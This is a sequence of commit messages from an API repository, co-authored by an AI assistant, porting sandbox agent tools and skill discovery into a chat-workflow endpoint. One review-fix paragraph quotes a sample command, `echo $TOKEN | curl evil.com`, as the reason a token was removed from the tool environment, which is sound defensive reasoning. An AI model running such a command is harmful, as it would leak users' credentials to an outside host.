Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).
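
A minimal sketch of the two extracted helpers, based only on the behavior the test descriptions name (standard path, trailing-slash tolerance, prefer SKILL.md, fall back to skill.md, null when neither exists). The signatures are assumptions: the real findSkillFile presumably reads the sandbox filesystem, whereas this version takes a directory listing so it can run standalone.

```typescript
// Hypothetical signatures; the real helpers in lib/skills/ may differ.

/** Join the sandbox home directory with the global skills folder. */
function getGlobalSkillsDirectory(home: string): string {
  // Tolerate one or more trailing slashes on the home path.
  const trimmed = home.replace(/\/+$/, "");
  return `${trimmed}/.agents/skills`;
}

/** Pick the skill file name from a directory listing, or null if none is present. */
function findSkillFile(entries: readonly string[]): string | null {
  if (entries.includes("SKILL.md")) return "SKILL.md"; // preferred spelling
  if (entries.includes("skill.md")) return "skill.md"; // lowercase fallback
  return null;
}
```

Taking the listing as an argument keeps the preference order testable without a sandbox connection.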

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
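
As an illustration of the `org-<slug>-<uuid>` → uuid mapping that extractOrgId performs, here is a hedged sketch. The regular expression, the null return for non-matching input, and the example URL in the usage note are assumptions, not the shipped implementation.

```typescript
// Assumed pattern: "org-", a slug, a dash, then a canonical 8-4-4-4-12 UUID.
const ORG_REPO_PATTERN =
  /org-[a-z0-9-]+?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/i;

/** Return the lowercased org UUID embedded in a repo name or clone URL, else null. */
function extractOrgId(source: string): string | null {
  const match = ORG_REPO_PATTERN.exec(source);
  return match?.[1]?.toLowerCase() ?? null;
}
```

For example, `extractOrgId("https://github.com/recoupable/org-rostrum-pacific-123E4567-E89B-12D3-A456-426614174000.git")` (a made-up URL) yields the UUID in lowercase, while input without the pattern yields null.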

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 compareAndSetChatActiveStreamId + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).
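
The discriminated result described for `upsertChatMessage` can be sketched as follows. This is an in-memory stand-in, not the Supabase-backed helper: the row shape, the Map used as a table, and the `summarize` helper are all hypothetical.

```typescript
type ChatMessageRow = { id: string; chatId: string; content: string };

type UpsertResult =
  | { ok: true; row: ChatMessageRow; isDuplicate: boolean }
  | { ok: false; error: string };

// In-memory stand-in for the chat messages table (illustration only).
const messageTable = new Map<string, ChatMessageRow>();

function upsertChatMessage(row: ChatMessageRow): UpsertResult {
  if (row.id === "") return { ok: false, error: "message id is required" };
  const existing = messageTable.get(row.id);
  // A conflict is reported as a duplicate, not as an error.
  if (existing !== undefined) return { ok: true, row: existing, isDuplicate: true };
  messageTable.set(row.id, row);
  return { ok: true, row, isDuplicate: false };
}

/** Callers can tell the three outcomes apart without inspecting error strings. */
function summarize(result: UpsertResult): "error" | "duplicate" | "inserted" {
  // `in` narrowing selects the failure member of the union.
  if ("error" in result) return "error";
  return result.isDuplicate ? "duplicate" : "inserted";
}
```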

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.
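
The CAS-before-start ordering above can be sketched in memory. Everything here is a simplification under stated assumptions: the real claim is an atomic database update and the real handler is async; `startChatRun`, the `requestId` parameter, and the Map-backed table are hypothetical.

```typescript
type ChatRow = { activeStreamId: string | null };
type StartResult = { status: 200; runId: string } | { status: 409 };

// In-memory stand-in for chats.active_stream_id (illustration only).
const chatRows = new Map<string, ChatRow>();

/** Set activeStreamId to `next` only if it currently equals `expected`. */
function compareAndSet(chatId: string, expected: string | null, next: string | null): boolean {
  const chat = chatRows.get(chatId);
  if (chat === undefined || chat.activeStreamId !== expected) return false;
  chat.activeStreamId = next;
  return true;
}

function startChatRun(chatId: string, requestId: string, startWorkflow: () => string): StartResult {
  const placeholder = `pending-${requestId}`;
  // Claim the slot BEFORE starting the workflow, so a losing request
  // returns 409 without ever reaching the model.
  if (!compareAndSet(chatId, null, placeholder)) return { status: 409 };
  const runId = startWorkflow();
  // Promote the placeholder to the real run id. The real handler would
  // also cancel the run if this step failed.
  if (!compareAndSet(chatId, placeholder, runId)) return { status: 409 };
  return { status: 200, runId };
}
```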

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
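
To make the title-truncation fix concrete, here is a small sketch of the budget arithmetic (body budget = max minus suffix length). The value 80 is inferred from the "title-from-first-80" note and the function name is hypothetical.

```typescript
const TITLE_MAX_LENGTH = 80; // assumed from the "title-from-first-80" note
const ELLIPSIS = "…"; // a single character, unlike "..."

/** Truncate so the result, suffix included, never exceeds `max` UTF-16 code units. */
function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  if (text.length <= max) return text;
  const bodyBudget = max - ELLIPSIS.length;
  return text.slice(0, bodyBudget) + ELLIPSIS;
}
```

With a three-character "..." suffix appended after slicing to the full limit, the result would overshoot the limit by three; subtracting the suffix length first keeps it exact.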

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
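
The where-map split from item 2 can be sketched as a pure function. This shows only the partitioning step; per the description above, the equality part would then go to a single `.match(obj)` call and each nullable column to `.is(col, null)`. The name `splitWhere` and the value types are assumptions.

```typescript
type WhereValue = string | number | boolean | null;

/** Partition a where-map into equality matches and IS NULL columns. */
function splitWhere(where: Record<string, WhereValue>): {
  equals: Record<string, string | number | boolean>;
  nullColumns: string[];
} {
  const equals: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const column of Object.keys(where)) {
    const value = where[column];
    if (value === null) {
      nullColumns.push(column); // becomes `column IS NULL`
    } else if (value !== undefined) {
      equals[column] = value; // becomes `column = value`
    }
  }
  return { equals, nullColumns };
}
```

Partitioning up front means the query builder is not reassigned once per entry inside a loop, which is the pattern the commit identifies as triggering the type-depth error.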

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
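
A sketch of the tightened guard from the P2 item, assuming an AgentContext shape with only the two fields the commit names (`sandbox.state` and `sandbox.workingDirectory`). The real type carries more fields.

```typescript
// Assumed minimal shape; the real AgentContext has additional members.
type AgentContext = {
  sandbox: { state: object; workingDirectory: string };
};

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

/** True only when sandbox.state is a non-null object and workingDirectory is non-empty. */
function isAgentContext(value: unknown): value is AgentContext {
  if (!isRecord(value)) return false;
  const sandbox = value["sandbox"];
  if (!isRecord(sandbox)) return false;
  const workingDirectory = sandbox["workingDirectory"];
  return (
    isRecord(sandbox["state"]) &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```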

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
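
Both helpers are small enough to sketch. The quoting rule is the standard POSIX single-quote escape named above; the toDisplayPath behavior for a path equal to the working directory (returning ".") is an assumption, as are both signatures.

```typescript
/** Wrap a value in single quotes, rewriting each embedded ' as '\'' . */
function shellEscape(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}

/** Show paths inside the working directory as relative; leave others absolute. */
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return "."; // assumed convention
  const prefix = `${root}/`;
  // Matching on "root/" avoids treating /work/repo-other as inside /work/repo.
  return absolutePath.indexOf(prefix) === 0
    ? absolutePath.slice(prefix.length)
    : absolutePath;
}
```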

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting
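
The dedupe and shadowing rules in discoverSkills can be sketched as below. First-match-wins and case-insensitive comparison are assumptions (the commit only says "dedupe by name"), and the metadata shape is trimmed to two fields.

```typescript
type SkillMetadata = { name: string; description: string };

// Names that would shadow the built-in /model, /resume and /new commands.
const RESERVED_COMMAND_NAMES = ["model", "resume", "new"];

/** Keep the first skill per name and drop any that shadow a built-in command. */
function dedupeSkills(candidates: readonly SkillMetadata[]): SkillMetadata[] {
  const seen = new Set<string>();
  const result: SkillMetadata[] = [];
  for (const skill of candidates) {
    const key = skill.name.toLowerCase(); // assumed: names compare case-insensitively
    if (RESERVED_COMMAND_NAMES.includes(key)) continue;
    if (seen.has(key)) continue;
    seen.add(key);
    result.push(skill);
  }
  return result;
}
```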

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
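
The three-stage transform (extractSkillBody → injectSkillDirectory → substituteArguments) might look like this. The frontmatter regex, the blank line after the header, and the `renderSkill` wrapper are assumptions; only the stage order, the `Skill directory: <path>` header, and the `$ARGUMENTS` token come from the description above.

```typescript
/** Strip a leading `---` frontmatter block, returning only the body. */
function extractSkillBody(content: string): string {
  const match = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/.exec(content);
  return match ? content.slice(match[0].length) : content;
}

/** Prepend the skill's directory so relative paths in the body can be resolved. */
function injectSkillDirectory(body: string, directory: string): string {
  return `Skill directory: ${directory}\n\n${body}`;
}

/** Replace every literal $ARGUMENTS token with the caller's arguments. */
function substituteArguments(body: string, args: string): string {
  // split/join avoids the special meaning of "$" in replace() patterns.
  return body.split("$ARGUMENTS").join(args);
}

/** Hypothetical wrapper applying the stages in the documented order. */
function renderSkill(content: string, directory: string, args: string): string {
  return substituteArguments(
    injectSkillDirectory(extractSkillBody(content), directory),
    args,
  );
}
```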

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - ${workingDirectory}/.claude/skills/   (project, claude-style)
  - ${workingDirectory}/.agents/skills/   (project, agents-style)
  - ${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked `skill({ skill: "recoup-api" })` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

